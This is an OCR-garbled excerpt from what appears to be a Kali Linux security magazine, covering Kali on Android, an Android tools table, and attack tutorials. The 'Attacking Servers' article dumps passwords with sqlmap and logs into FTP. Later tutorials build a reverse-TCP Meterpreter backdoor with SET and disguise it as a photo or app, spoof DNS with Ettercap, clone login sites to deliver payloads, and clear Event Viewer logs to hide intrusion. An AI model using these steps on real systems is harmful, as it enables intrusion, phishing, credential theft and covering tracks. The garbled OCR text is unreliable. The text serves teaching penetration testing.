] /a*v/tha ... ship 
] Upditmg cent IpntlM 

] -t*fc ... don* 
] Starting 

] SSH 22 . BBM 

I lAiC uHHB ♦ * » 





Figure 7. Server started 
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Figure 9. Ka// /./ni/x booting 



Figure 1 0. Extracted folder containing kali.img 
Optional 02 

Armitage tool can also be added. Armitage is a 
scriptable tool for Metasploit that visualizes tar- 
gets, recommends exploits and exposes the ad- 
vanced post-exploitation features in the Metasploit 
framework. It has many features for discovery, 
access, post-exploitation, and manoeuvre, which 
makes is more effective. The command to install 
Armitage is: 

apt-cache search armitage && apt-get install 
armitage 

Method 02: Install Kali Command Line 
Interface (CLI) using Chroot Environment 

In this method the chroot operation is used to deploy 
Kali Linux. The chroot operation changes the root 
directory for the current running processes and its 
children processes by creating and hosting a sepa- 
rate virtualised environment. Any program deployed 
using this operation is confined to the defined base 
directory. Here the chroot operation is used to setup 
the Kali Linux platform for pentesting. 

Requirements 

Rooted HTC One X mobile device with 6GB free 
space, BusyBox free app & Terminal Emulator app. 

Methodology 

• Download pre-compiled chroot kali distribution 
from http://googl/qmGle. Mirror: https://archive. 
org/details/Kali. nogui. armel. zitstif. chroot. 4 820 13 

MD5: d60c5a52bcea35834daecb860bd8a5c7 

SHA1: f62c2 633d214de9edadl842c920 9f443bcea385d 

• Extract the downloaded archive onto phone's 
internal storage folder /sdcard/kali, 

• Kali folder contains three files, hashsum, 'kali' 
shell script and 'kali.img' file (Figure 10), 

• Install Terminal Emulator app.To run the Kali 
chroot environment use the below command: 
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Figure 11. Kali chroot prompt 
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Figure M.Metasploitin Kali chroot 



*Note: Kali file requires permissions to be an exe- 
cutable and we can set it using this command first: 

Chmod 755 /sdcard/kali/kali 

then use this command to run Kali 

su -c /sdcard/kali && sh kali 

Optional 01 

Terminal Emulator can be configured to start the 
session directly in the Kali chroot environment by 
adding the following command in: Preferences » 
Initial Command 

su -c "cd /sdcard/kali && sh kali" 

Optional 02 

Update the distribution by using the following com- 
mand: 

apt-get update && apt-get upgrade && msfupdate 

Optional 03 

Enhance functionality by adding below mentioned 
tools from app store. 

Summary 

Kali Linux GUI or CLI both are equally powerful 
when combined with Android Platform. The begin- 
ners can start using kali GUI on mobile device and 
the more experienced who are comfortable with the 
terminals can have fun using kali CLI. In the future, 
more mobile-based tools and apps are going to 
flood the markets and we need to start using mobile 
devices and smartphones as they and becoming 
inexpensive and more functional. Hope this article 
is helpful, informative and encourages you towards 
the field of cyber security and pentesting. 

DANIEL SINGH 
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ty consultant and prominent speaker at 
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Table 2. Tools for enhancing functionality 



App Name 


Description 


Ann 1 FTP 
aai iur i r 


fto/cfto /^li^nt 

1 L yJI j 1 L U L_ 1 1 C 1 1 L 


AnHroiH 1— Ip/^korc 
am i u i u i u ndL i\tr i j 


chn\A/c /~om r>loto pmHroiH info 

Dl lUVVD L-UI 1 lUICLt: dllUIUlU IIIIU 


AnHrniHVNr 

Ml lUIUIUVIMVw. 


\/n/"* x/ioxA/or /Hiont 
v 1 1 v_ vitrvvtri v_iiciil 


AnH^MR 

AAI IUJIVID 


AnoVoiH ^amha r^li^nt 
aaiiuiuiu, _)diiiud v_ 1 1 tr 1 1 l 


A nt^n npiQ 
ni i lci 1 1 id j 


chnvv/Q mohil^ antpnnac pnrl miir'h 
j 1 1 u vv j iiiuuiicdiiLCinidodiiu iiiuv.ii 

more info 


AnyTAG NFC 
Launcher 


Automate your phone by scanning 
NFC tags 


APG 


OpenGPG for Android 


APK Dumper 


copies apk of selected apps 


App List Backup 


says what it does 


Bugtroid 


pentesting and forensics 


CardTest 


Test your NFC enabled credit cards 


(~]ne±r[(Qi im 

v_l ICl_l\oUI 1 1 


fnl II tool for mH^ci im anrl chpci im toolc 
vjui luui i ui 1 1 iujjui i i di iu di idoui 1 1 iuuij 


C on n£i<~tRot 

V_U 1 II IGL-LDUL 


ooxA/f^rf 1 1 1 cch r"li<^nt 
jjuvvgi IUI Jill \-\ ICI 1 L 




nprform DM^ and WHDK lookiirK 

ptri IUI 1 1 1 UMNO dl IU VVrivJIJ IUUMJ|Jj 


Dolohin RroxA/c^r 

L/UIUIIIII Dl UVVoCI 


hrnwepr that o^cilx/ pIIo\a/c \/oi i to 
ui uvv ogi li id i cdoiiy diiuvvo yuu lu 

change your UserAgent 


niroio'r'Pit 

VJ 1 UIUL_d L 


incoirpH ox/firp/^pt 
nioUiitru uy MitrL-dL 


Droidsheep 


Security analysis in wireless 

notiA/orl/'c 
1 1 tr IWUI Kb 


Droidsheep Guard 


app for monitoring Androids ARP-table 


DroidSQLi 


automated MySQL injection tool 


dSploit 


Android Network Penetration Suite 


Electronic 
Pickpocket 


wirelessly read NFC enabled cards 


Exif Viewer 


shows exif data from photos and can 
remove this information 


Fast notepad 


simple but useful notepad 

dfJfJMLd UUI 1 


FinH Rn i itor'c 
rillU IVIy nUULcl j 

Password 


titlo ovnlainc it ^11 fmoctlx/ for H^fai lit 
LILIfcf fcfX|Jldlllb IL all vlilUbLiy IUI UcldUll 

passwords) 


Fing 


very similar to Look@LAN tool for 


Goomanager 


front end for android file hosting 


Hacker's Keyboard 


as the name says 


nd ji ir djj 


trpnclptp to vt" into hpch^c 

LldllbldLvT LCAL 1 1 1 LU 1 Idol ICj 


Hex Editor 


hex editor for Android 


Hex Pirate 


hex editor for Android 


inSSIDer 


wireless network info 


intercepter-NG 


mutli-function network tool, sniffer, 
cookie intercepted arp poisoner 


IP info Detective 


detailed information regarding the 
IP address 


IP Webcam 


Android device into an IP security 
camera 


Loggy 


view your logcat in your desktop browser 



Maluuba 


voice activated assistant 


network 
discovery 


Computer/device discovery and port 
scanner 


Network Signal Info 


graphical tool for iwconfig 


network tools 


periodic monitoring of websites, 
servers, routers, surveillance 
systems, etc 


NFC ReTAG 


Re-use write protected NFC Tags 
such as hotel key-cards, access 
badges, etc 


NFCTaglnfo 


another NFC reader 


obackup 


Easily backup your entire device to 
the cloud in one tap 


OpenVPN Connect 


open vpn client 


Orbot 


tor on Android 


Packet Injection 


poorman's GUI version of scapy 


portknocker 


as name says 


ProxyDroid 


use your socks5 proxy with this 
application 


python for 
android 


as name says 


re key 


app that fixes the recently-disclosed 
"Master Key" vulnerabilities 


Root Browser 


great file manager for Android 


SandroProxy 


kind of like Webscarab 


Screenshot 
Ultimate 


to take screenshots 


Secret Letter 


poorman's stegonagraphy tool 


smanager 


script manager 


smart taskbar 


as name says 


SSHDroid 


openssh server for android 


STUN Client 


app to find out what kind of firewall/ 
NAT you're behind by using the 
STUN orotocol 


SU Update fixer 


as name says 


Supersu 


manage what programs access root 
functions 


Teamviewer 


remotely control Windows, OSX, and 
Linux based systems 


Terminal Emulator 


no explanation needed 


timely 


alarm 


tPacketCapture 


as name says 


VirusTotal Uploader 


test your malicious payloads 


Voodoo OTA 
RootKeeper 


maintain root access even after 
updates 


Wifi File Transfer 


access files on your phone from a 
web browser via an http server 


WifiFinder 


simple wireless scanner 


WiGLE Wifi 


Open-source wardriving app 
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A Cyber criminal can target and breach 
your organization's perimeter in less than 
a second from anywhere in the world ... 

Are You Prepared? 

AIMRC delivers advanced cyber security training, consulting, and development services 
that provide our customers with peace of mind in an often confusing cyber security environment. 
ANRC's advanced security training program utilizes an intensive hands-on laboratory method 
of training taught by subject matter experts to provide Information Security professionals with 
the knowledge and skills necessary to defend against today's cyber-attacks and tomorrow's 
emerging threats. 

ANRC's consulting and development services leverage team member knowledge and experience 
gained in the trenches while securing critical networks in the U.S. Department of Defense and 
large U.S, corporations, ANRC tailors these services to deliver computer security solutions specific 
to the needs of the customer's operational environment. Our approach emphasizes a close relationship 
with our clients as an integral part of our service, We believe we're all in the security battle together, 
and we view our customers as key members of our team in the fight, 
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ATTACK 

Kali Linux, Attacking 
Servers 



This article will show you how to perform attacks on web 
servers, getting full access to the system and database. Just 
by using some of the Top Ten' tools of Kali Linux, 



Kali Linux is probably one of the distributions 
more complete for the realization of pene- 
tration test. This is accompanied by many 
tools of all kinds. In this article we'll see some ex- 
amples on how to perform attacks using only some 
of the Top Ten tools of Kali Linux focusing on those 
that are designed to attack web servers... 
Generally an attack is performed as follows: 

• Collection/information gathering. 

• Anonymity. 

• Search vulnerabilities. 

• Exploitation of the systems. 

• Post exploitation. 

• Elimination of proofs. 

• Executive and technical report. 

We will focus on the following: Information Gath- 
ering, search vulnerabilities, exploitation and Post 
exploitation. 

It is important to know that: in this article you are 
working with a series of tools for a specific pur- 
pose, but this does not mean that the tool can only 
be used for this purpose. The vast majority of the 
tools have multiple uses. 

Nmap: Information gathering 

When we are ready to perform an attack, the first 
and most important step is the collection of infor- 



mation. Knowing all the potential weak points is 
our goal. To do this the first thing that we are going 
to do is to conduct a port scan with nmap. In this 
way we will know what type of services or applica- 
tions run under the web server. 

As shown in Figure 1 , we see the result of a basic 
scanning launched from nmap, more specifically 



Zenmap 



Scar Tools Profile Help 



Target: 



V Profile: 



[scan] | 



[nmap -"M ■ 




Hosts SrrwccsJ | Nmap Output p ur ta . / HuiLi, Tupuluyy Hflt t D*t*Li 
nmap -14 -F .^tfM^ 



Starting fimnp fi.?fi ( http :,//nmnp .ting ) at 

28 13 -09-83 U: 14 ttsr 

Nmap scan rgport for 

Host is up (0.079b latency] . 

Not shown ; 83 closed ports 



Details 



VTATF 
open 
open 
i hp mi 
open 
open 
open 
open 



pout 

21/tcp 
22/tcp 
25/tcp 
Wtcp 
flfl/rf p 
IBb/tcp 
110/tcp 

139/tCp 
143/tcp 
443/tcp 

445/tCP 

995/tcp 
llflfr/rr p open 
U44i/tcp open 



fiFDVTCF 
ttp 

ssh 
sml [i 
dona in 

tittp 
poplpN 
pop3 

filtered msrpc 
tiLtersd netbios-ssn 



open 
open 
tilts 
open 
open 
open 



imap 

tittjn 
I flic rosott -ds 
smtp^i 
imdp^ 
pop 3s 

tittps-aLt 



Figure 1 . Result of scan with Zenmap. Multiples open ports 
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from Zenmap, the graphical version of nmap. The 
scan showed a few open ports on the server, and 
this may give us some clues as to where to find 
potential vulnerabilities. The information which has 
taken us back is quite juicy, the server that we are 
attacking has more of a role assigned, therefore 
more points to that attack. 
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Figure 2. /Acces denied for mysql backend 
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Figure 3. Automatic full scan with OWASPZAP 



Some of the services that are attacked : 

Port 21 FTP 
Port 110 pop3 
Port 3306 mysql 

These will probably be the most vulnerable, be- 
cause the rest of which ports are open on the serv- 
er have a connection with the security type SSL or 
TLS, as is the case of HTTPS, SMTPS, POP3S 
or of the SSH. These protocols and their connec- 
tion, have a very robust encryption, which is why it 
is more complex to obtain a key using brute force, 
or crack a password sniffing the traffic on a LAN. 

As an example; both by the port 21 as the 110 
could be attempting to perform a brute-force at- 
tack. On the other hand, we have port 3306 that 
tells us that mysql installed. 

We will do some checking typical to perform a pen- 
etration test, such as trying to access an anonymous 
user FTP, or verify access to mysql is enabled. 

In Figure 2, shows how the mysql Backend can 
only be accessed from within the LAN itself. 

However, having a mysql installed and see so 
many open ports makes us think that the web that 
we are attacking have more than one database 
dedicated to various services, for example, for the 
main page, a database, for the blog other, and so 
on for each part of the web. This can mean that 
some of the parts of the web page is vulnerable. 

OWASP: Search vulnerabilities 

Once that we have some information on the objec- 
tive, the next step will be to seek vulnerabilities with 



IrtlurniHliunnl (Warning] 


X-Fram e -Options headp 


S 


at set 


Description 


X-rrame-Gptioras- header is not included in the HTTP response to protect against 'ClickJacking' attacks 


URL 


ngB^^^v^ ' mwm_ fBSL — «. 


Solution 


Most modern Web hmwsers support the? k r - Frame-Options HTTP header, ensure it's set 1 on All web pages returned by yntir site (if you expert the page to he framed only by 
pages on your server (e.g. it's part of a FRAMESET) then you'll want to use 5AMEQR1GIN, otherwise if you never expect the page to be IramEdJ^yoii should use DEMY). 







http^/blogs .mDdnxorrVbyieinternal[3/archivt!y20iO/03/30/combating clickjacking with x Iramc option s as px?Rcdirectcd=truc 



High (Warning Cures Site 5 clip ling (Reflected) 



Description Cross-site Scripting (XSS) is an attack technique thai invotves echoing attacker-supplied code into a user's hrowser instance A browser instance can he a standard weti 

hmwser client r or a hmwser object ernhedrted in a software product such as the browser within WinAmp, an RSS reader, nran email client The code itself is usually written 
in UTTMI /.lavaScript r hut may also extend to VFlSciript, Active^ .1ava r FJash, nr any other hrowser-supported technology 

When an attacker gats a user's firowcar to execute hlsmer code, the code wtll run within the. security context (or zone) or the hostlnq web site. Wltn this level of privilege, 
the code has th« ability to read, modlty and transmit any sensitive data accessible By the Browser. A Crossste Scripted user could have his/her account c hackee (cooklrj 
Hied), their biowser 4edirecteU to another location, nr possibly shown h audul end content delivered by Uie web sile they are visiting. CrWS«6lll Scripting attacks e ssen Jally 
compromise the Lru^L relationship between a user »nd the web vile. Applications utilizing biowser object instances which load content Iroin the File systlffl may execute 
cade undei the local machine zone allowing fur system compromise. 

I here ore three types or Lroso sitD Scripting attacks: non persistent, persistent and DOM Based. 

H on-persistent attacks and DOM-hased attacks require a user to either visit a specially crafted link laced with malicious code, nr visit a malicious web pane containing == 
weh fomn j which when posted to the vulnerable site, will mount the attack Using a malicious form wild oftentimes take place when hbe vulnerable resource only accepts 
HTTP PHFIT requests In such a case, the form can be submitted automatically, without the victim's knowledge (e g hy using JavaScript) Upon clicking on the malicious 
link or submitting the malicious form, the payload will get echoed back and will get interpreted by the usee's Browser and execute. Another technique to send almost 
arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Hash. 

Per si stent attacks occur when the malicious, code is submitted Ut a web site where it's stored Toi a period ol Uiue. Examples or an alLackeis favoiite targets often include: 
message hoard posts, web rribiil messages, and web chat software, flie urisus pec Ling usei is not requiied to interact witHi any additional site/link (e.g. an attacker site or ai 
malicious link sentuia email), just simply view Lhe weh page containing the code. 



Figure 4. Report in html from OWASP 
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the OWASP tool. At the time of use OWASP we 
can use this of two different ways. The first of them 
would be to use OWASP as a proxy in our browser, 
intercepting and all the connections that are made 
with Firefox, Chrome, or any other browser. 

In this way we can establish the attack in a sin- 
gle point, that is to say, possibly the web to which 
we are attacking has multiple URL, between the 
BLOG, the main page, the access to the extranet, 
access to suppliers, and so on using as a proxy 
OWASP interceptions exclusively part of the web 
server that we want to attack. 



tutor ft*n-clnfrp?qu«ry' 




Figure 5. XSS (cross site scripting) exploited 




The other way to use OWASP to search for vul- 
nerabilities is doing a full scan of the web site. 

Later I'll show you how to do it. This option is 
less advised that the previous one, however, can 
help us in the time to search for these vulnerabili- 
ties, this method is faster. It is less advisable to use 
this method, or better said, the handicaps of using 
as a proxy is, that if you do a full scan on a web- 
site, OWASP runs through all the URL of the page 
and tries to find vulnerabilities in each of the par- 
ties of the web. This implies that the IDS or firewall 
of server to that we are attacking can detect an in- 
trusion attempt. 

OWASP when perform a full scan, launches all 
possible attacks, grouping the vulnerabilities found 
based on their criticality. 

In the image below (Figure 3) we see the result 
obtained by OWASP on a full scan of the web site 
that we are attacking. 

Once that we already have the result of the scan- 
ning, the most advisable is to perform a first look 
at the potential vulnerabilities, and then export it in 
.HTML in order to be able to focus on those vulner- 
abilities that we are the most interested in. 

Figure 4 is the result already exported and in de- 
tail on the vulnerabilities found. 

One of the vulnerabilities found was a XSS (cross 
site scripting) and to exploit it is as simple as go 
to the browser and insert the URL which showed 
OWASP. Figure 5, is the result of XSS. 



•i'eh server operating system: Linux Red \ 

^eb application technology: Apache 2.2.; 

sack-end DBMS: MySQL 5.0 
12:Q4:6G] [ INFO] fetching columns for 1 
12:04:60] [INFO] the SQL query used re1 
12:04:00] [INFO] retrieved: "id" ,"int ( : 

.12:04:00] [INFO] retrieved: "type" ,"vai 
12:04:00] [INFO] retrieved: "password", 

Jatabase: psa 

"able: accounts 
3 columns] 

+ + 

Column | Type | 
+ + 

id | intflO) unsigned | 

password | text | 

type I varchar(32) j 
+ + 

12:04:00] [INFO] fetched data logged it 
*] shutting down at 12:04:00 




Figure 6. Showing the databases with sqlmap 



[12:07:51] [INFO] the back-end DBMS is MySQL 
w'eb server operating system: Linux Red Hat Ent 
w'eb application technology: Apache 2.2.3, PHP 
back-end DBMS: MySQL 5.0 

[12:07:51] [INFO] fetching columns for table 1 
[12:07:51] [INFO] the SOL query used returns A 



[12:07:51] [INFO] retrieved: "id", 

[12:07:51] [INFO] retrieved: "logi 

[12:07:51] [INFO] retrieved: "accc 

[12:07:51] [INFO] retrieved: "pd_i 
Database: psa 
Table: pd_users 
[4 columns] 

+ + + 



"id Vint ( IG) uns 
"login" , "varchari 
"account_id" , "in1 
"pd id", "int(10) 



srp rise 
5.1.6 

sd_users 
ent ries 
igned" 
20) 11 

(10) uns 
.insignet 



account_id 
id 



int(lO) unsigned 
int(lO) unsigned 
varchar(20) 
int(lO) unsigned 



+ + 4 
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[12:07:51] [INFO] fetched data logged to text files ur 
[*] shutting down at 12:07:51 



Figure 7. Results of the table containing the users 
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Figure 8. Results of the table containing the passwords 
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SQLmap: Exploiting vulnerabilities 

After verifying that the fault discovered by OWASP 
are exploitable, we spent a sqlmap where we en- 
tered a field a bit more fun. 

Among other vulnerabilities, we found a possible 
failure of SQL injection. 

The first thing is to check whether there is such 
failure by entering the URL that showed us OWASP. 

Knowing that is vulnerable, we used sqlmap tool 
to automate the processes of SQL injection. 

The same as it happens with OWASP, there are 
two ways to use sqlmap, one of them would be us- 
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Figure 9. Dump of users data and passwords 
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•Qactualikiad 
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►l_jwp content 
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4KB 








wp -content 


4 KB 
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Fh. .. 
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1 KB 


php 
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license-.txt 


15 KB 
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read me, html 


8KB 


html 
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wpj-dpp.php 


32KB 


php 
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wp-atom-php 


1 KB 


php 
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wp-blog-header.php 


1 KG 


php 
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1 KB 


php 
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1KB 
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wp-feed.php 


1 KB 
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wp links opmf.php 
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wp-login.php 


17 KB 
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6KB 
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wp-pass.php 


1 KB 
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wp-rdt.php 


1 KB 


php 
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wn-re*pkte.r.nhn 


1 KB 
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Figure 1 0. Full access to the FTP server 



ing the wizard, and the other entering the param- 
eters one by one. 

For example: we'd use the following command to 
know which are the DATABASE of server (Figure 6). 

sqlmap -u http://www.website.es/actualidad/evento. 
php?id=110 --level=5 --flush-session -dbs 

Then the options that we offer sqlmap, would get 
the tables from a database, after, then users, and 
so on up to obtain the passwords. It could even 
make a dump of all the DB. 

Sometimes the users and passwords are in dif- 
ferent tables, however this is not a problem, we 
cannot continue with the process of intrusion. Fig- 
ures 7 and 8 show the users and passwords in dif- 
ferent tables. 

To do a dump of these two tables, we get the 
account id and the password (Figure 9), which in 
addition, seeing the user name I suppose it is the 
user that gives access to the FTP. 

And as we saw earlier, one of the open ports was 
precisely the 21. Thus, we tried to enter and ... 
We're already inside! 

Navigating a little for folders on the ftp we realize 
that the website has a blog with Wordpress (Figure 
10). This makes it easier for us once more to get 
access to the system ... 

We downloaded the file wp-config to view the 
user that connects with the Wordpress Database, 
and we try to connect to a mysql client (Figure 11). 

Summary 

With only 3 programs we have obtained full access 
and with root permissions to Mysql. Also, we have 
had access to the FTP server where are housed all 
of the files of the web site, and where we could get 
a remote shell. 

These 3 tools are in the Top Ten of Kali Linux. These 
are without doubt the tools to be considered in order 
to make hacking attacks and penetration testing. 



► - I* ***** Mta 




Figure 1 1 . Full access to the Mysql Server with mysql client 
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Hands-on: How To 
Create /Backdoor' 

To Remote Access With Kali Linux 

Now I will introduce you to a technique that will use SET 
(social engineering toolkit) available in Linux Kali ... 
Let's create a backdoor that can be used to remotely control 
a Windows computers. 

We will create an executable legitimate, hardly detected by 
any antivirus, so we complete a computer target. 
I want to point out that all the information here should be 
used for educational purposes or penetration test, because 
the invasion of unauthorized devices is crime. 



Backdoor is a security hole that can exist in a 
computer program or operating system that 
could allow the invasion of the system so 
that the attacker can get a full control of the ma- 
chine. 

Referring to a backdoor, this is a 'backdoor' that 
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Figure 1. Social Engineering Toolkit, Step 1 




28 



Figure 2. Create the Payload and Listener, Step 2 
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may be exploited via the Internet, but the term can 
be used more broadly to describe ways of stealthy 
obtaining privileged information systems of all 
kinds. 

There are cases where the computer program 
can contain a 'backdoor' implemented at the time it 
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Figure 3. Enter the IP adress, Step 3 
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Figure 4. Sef payload, Step 4 
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was compiled. Generally this feature is interesting 
when software must perform update operations or 
validation. 

Step to Step 

I hope to do a walkthrough theoretically simple: 

First we access the menu: "Applications/Kali 
Linux/Exploitation Tools/Social Engineering Tool- 
kit" and click "seetoolkit". It will be a menu like that 
seen in the Figure 1. In the options menu select 
option 1 . 

In the second menu select option 4 (Figure 2). 

In this screen below you should properly input 
your IP address. If you have questions open a new 
terminal and type ifco nfig ethO then fill in this field 
correctly (Figure 3). 

In the screenshot below, you should choose the 
second option to create a connection reverse, our 



target computer is who will connect to the attack- 
er (Figure 4). In the screenshot below to watch 3 
steps we perform first the kind of backdoor, type 
16, then we must define the portal site, the attack- 
er's machine that will be listening' for connection 
attempts made by the target. The default port is 
443 you can choose to change the port if it is al- 
ready being used. We can enter another number 
and then press 'Enter', Next you're asked whether 
to start listening', you must enter 'yes' (Figure 5). 

With these procedures the 'backdoor' will be cre- 
ated and our computer will begin to 'listen' for con- 
nections from the target machines. 

The executable is created in the folder /usr/ 
share/set/ and is called 'msf.exe'. 

The goal is to make it an executable, then we 
can open a new terminal and type the following 
command 



A chmod + x / usr / share / set / msf.exe A 
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Figure 5. Start the listener, Step 5 
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: 



Figure 8. Ettercap, Step 2 



Figure 6. Starting interaction, Step 6 
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Edit View Search Terminal Help 




Figure 7. Ettercap, Step 1 
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Figure 9. Ettercap, Step 3 
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If you want to you can rename this file to facil- 
itate the process of social engineering to con- 
vince someone to opening a photo or install a 
new application. 



£\ OpMAIl pMJflW 

V ? fan 




Figure 10. Start Sniffing, Step 4 
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Now we need to copy this executable to the tar- 
get machine and so it runs a Figure 6. 

Here to enter the command 'sessions' can list the 
targets already connected. 

When we type 'sessions -i V (assuming 1 is the 
ID number displayed by the command 'sessions', if 
another number is displayed just change the num- 
ber shown by 1 ) we will be able to interact with the 
target machine with full access. 

DNS spoofing attack with Ettercap 
INTRODUCTION 

DNS spoofing is a method in which the attacker com- 
promises a name server (Domain Name System). 

The server accepts and incorrectly uses the in- 
formation from a 'host' who has no authority to pro- 
vide this information. 

Using this technique, the attacker can direct the 
victim's browser or email to their own server. 

The technique consists of the data that is entered 
in a Domain Name System (DNS) 'name server's 
cache database', making the name of the server to 
return an incorrect IP address, diverting traffic to 
another computer. 

Step to Step 

Open the terminal. Type and hit enter (Figure 7): 




Figure 13. Social Engineering Attacks, Step 2 



Figure 11. DNS Spoof, Step 5 
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Figure 12. Social Engineering Toolkit, Step 1 

iHamn9 



Figure 14. Website Attacks, Step 3 
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# vi /usr/share/ettercap/etter . dns 

Just edit and save, exit and enter after 'ettercap- 
G' to open Ettercap in graphical mode. 

Go Sniff: 'Unified Sniffing', when prompted, 
choose your NIC 'ethO' (Figure 8). 

Concepts 

This type of attack is important to get some creden- 
tials during the execution of the penetration test. It 
consists of sending false answers to DNS requests 
that are made. To execute this attack, you must ed- 
it the file 'etter.dns', as it is the file 'hosts' windows 
and linux, we can configure to which requests are 
sent. In 'Hosts' click 'Scan for hosts'. 

Again in "Hosts" click Host List 'to view a list of all 
available IPs on the network, which will select the 
target that will receive the false answers and click' 
Add to Target V (Figure 9). 

Now click on 'Start', 'Start Sniffing'. 

After go 'MitM': 'Arp Poisoning'. Select the option 
'Sniff remote connections' as below and click 'OK' 
(Figure 10). 

Go to 'Plugins', 'Manage the Plugins' and double 
click dns_spoof (Figure 11). 

Done that the 'selected customer' will start get- 
ting false answers to DNS. 




Cloning Site with Kali Linux 
INTRODUCTION 

SET Attack Method: 

The Social Engineer Toolkit (SET) has been de- 
veloped to perform advanced attacks against the 
human element. SET was designed to be launched 
with http://www.social-engineer.org and quickly 
became a standard tool in the arsenal of penetra- 
tion testers. The attacks built into the toolkit are de- 
signed to be focused on attacks against a person 
or organization used during a penetration test. 

This hacking method will work perfectly with the 
'DNS spoofing or Man in the Middle attack method'. 

I will present methods of attack like this can have 
computer in few steps. 

Step to Step 

Enter on Applications: Kali Linux: Exploitation 
Tools: Social Engineering Toolkit: then Select 'se- 
toolkit' (Figure 12). 
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The second method w1H rtnmpl. etel y cA one n website of ynur chnnslng 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to dona. 

The third method nllows ynu to import ynur own wehstre, note that ym. 
should only have an index .html when using the import website 
functionality . 
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Figure 17. Web Templates, Step 6 



Figure 15. Java Applet Attack, Step 4 
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Figure 16. Site Cloning, Step 5 
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Figure 18. URL to be cloned, Step 7 

HaHin9 



/■ \ 



31 



ATTACK 



Then Select option 'Social Engineering Attacks' 
using no. So it will create another window: Fig- 
ure 13. Then Select option 'Website Attack Vec- 
tors' which is the unique way of using multiple web 
based attacks... (Figure 14). 

After that Select option 'Java Applet Attack' 
method will spoof a Java Certificate and deliver a 
'metasploit' based payload (Figure 15). 
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Figure 19. Generating Payload, Step 8 



Select the option which is for 'Site Cloning' that 
will allow SET to clone the Site that you will define 
so that it can utilize that attack (Figure 16). 

After pressing enter on the 'Web Template' will 
show how to use the PORT/ NAT or other. Next 
step, enter the IP of your Kali linux, so you can do 
reverse connection to your machine when the tar- 
get using the link provided by you (Figure 17). 

After you provide the URL to be cloned as Ya- 
hoo, Twitter, Facebook. You can collect various in- 
formation about the target (Figure 18). 

Provide the URL to start cloning, and then, once 
that's done, will start generating 'payload' and 
some files as jar file, index.html (Figure 19). 

Select the 'payload' necessary that you want to 
generate. I'm using the second option, which is the 
'Windows Meterpreter Reverse_TCP' that will cre- 
ate a shell access between the attacker and the 
target machine that is between my Kali Linux (Fig- 
ure 20). It will display 'list of Encoding's' that will 
help you bypass the security target. I prefer 'Back- 
doored Executable', it is best to find a 'spamhole' 
on the machine in question (Figure 21). 

Will begin to generate multiple 'Powershell code 
based Injection' based on common ports such as 
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Figure 20. Windows Meterpreter Reverse_TCP, Step 9 



Figure 22. Powershell, Step 11 
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Figure 2\.BackdooredExecutable(BEST), Step 10 
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Figure 23. Reverse TCP Connection, Step 12 
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53, 80, 443, in his 'Attacket machine' to the target 
using one where the 'payload' is generated. 

Select Option 16, will ask for the 'Port Number'. 
Press Enter then it will use the default port number. 
It will launch the 'Launch the Web SET will start 
appearing and the number of vulnerabilities and 
then it will generate a link that you can move on 
to the target and once he uses that link, your ma- 
chine will create a connection 'Reverse TCP Con- 
nection ' with the attacker's machine on the num- 
ber of doors (Figure 23). 

The Code execution ' PowerShell ', which will run 
in the background and then will load ' MSF ' and 
generate a 'link' that when a person clicks it will 
creates reverse connection open to you within the 
network (Figure 24). 

This will provide a link when trying to open the 
target, all the information from your system back 
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to us via ' Reverse TCP Connection' (Figure 25). 
While one tries to use this link will generate a con- 
nection on some port between the attacker and the 
target, which is 'TCP'. After these procedures the 
'payload' is generated and when you use this link 
on the machine to open a cloned page also gener- 
ates the file '.jar' whose function is to establish the 
connection between the two machines (Figure 26). 

Let's create a session with the machine, going 
to my local machine can check if the connection 
was successful or not. We should use the com- 
mand 'netstat'. 

Example: netstat-year | find "57804". 

When we are connected to the target machine, 
you can run many programs and can edit the files. 

Run 'Event Viewer' and remove all notifications, 
so it becomes more difficult to track what is hap- 
pening with the machine. 

Although we can trace the connection estab- 
lished with the command "sessions-l". 

After running the command will start sending 
'HTTP packets' to the target machine via the 'GET 
method'. 

This shows that the connection has been estab- 
lished with the machine. 

You can use utilities such as Restart, Shutdown 
the system. 

It is worth remembering that I made this article 
for educational purposes only, I am totally against 
the cybernetic crime, so use it with conscience. 



Figure 24. Starting the payload handler, Step 13 
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Figure 25. The attack, Step 14 
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Figure 26. Establish the connection, Step 15 
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Kali Scanning for 
HI PAA 

A Proof of Concept: using Kali Linux to deploy distributed 
network vulnerability scanners for medical clients 

The Health Insurance Portability and Accountability Act of 
1 996 (HIPAA) requires organizations who handle electronic 
Protected Health Information (e-PHI) to take action and 
reduce risk relative to potential security breaches of digital 
communication and storage of patient information. 



Open Source solutions can be leveraged as 
a low-cost and effective strategy to mini- 
mize risk when used as component of a 
larger information security program. With a long 
"track" record of community support, Kali is an 
open source Linux distribution containing many 
security tools to meet the needs of HIPAA network 
vulnerability scans. 

Note 

This article is not as much a how-to as it is a proof 
of concept and evaluation of Kali on low-cost hard- 
ware (Raspberry Pi in this case). As such, I will dis- 
cuss my overall experiences here but will not get 
into the weeds of the build process for the scan- 
ner. There are much better resources elsewhere 
to explain the details of this particular project. In 
other words, I am not reinventing the wheel here 
and have borrowed heavily from readily available 
online resources. Think of this as more of a busi- 
ness case with some of the technical bits included. 

As Senior Consultant for a Managed Service 
Provider company, I have a need to develop a 
scalable low-cost solution for performing HIPAA 
vulnerability scans. The scans will be part of a larg- 
er Information Security consulting service to assist 
clients with their HIPAA compliance program. As a 
Business Associate of Covered Entities (meaning 
- vendor of medical companies), the security solu- 



tion will also be used to support the internal com- 
pliance program of our technology firm. 

The requirement for risk analysis (and conse- 
quently vulnerability scans) is explained in the 
Guidance on Risk Analysis Requirements under 
the HIPAA Security Rule document published by 
the US Department of Health and Human Services 
(http://www. hhs. gov/ocr/privacy/hipaa/administra- 
tive/securityrule/rafinalguidancepdf.pdf): 

Risk Analysis Requirements under the Security 
Rule. The Security Management Process standard 
in the Security Rule requires organizations to "[i] 
mplement policies and procedures to prevent, de- 
tect, contain, and correct security violations." (45 
C.F.R. § 1 64.308(a)(1 ).) Risk analysis is one of four 
required implementation specifications that pro- 
vide instructions to implement the Security Man- 
agement Process standard. Section 164.308(a)(1) 
(ii)(A) states: RISK ANALYSIS (Required). 

Conduct an accurate and thorough assessment 
of the potential risks and vulnerabilities to the confi- 
dentiality, integrity, and availability of electronic pro- 
tected health information held by the [organization]. 

...Vulnerability is defined in NIST Special Pub- 
lication (SP) 800-30 as "[a] flaw or weakness in 
system security procedures, design, implementa- 
tion, or internal controls that could be exercised 
(accidentally triggered or intentionally exploited) 
and result in a security breach or a violation of the 
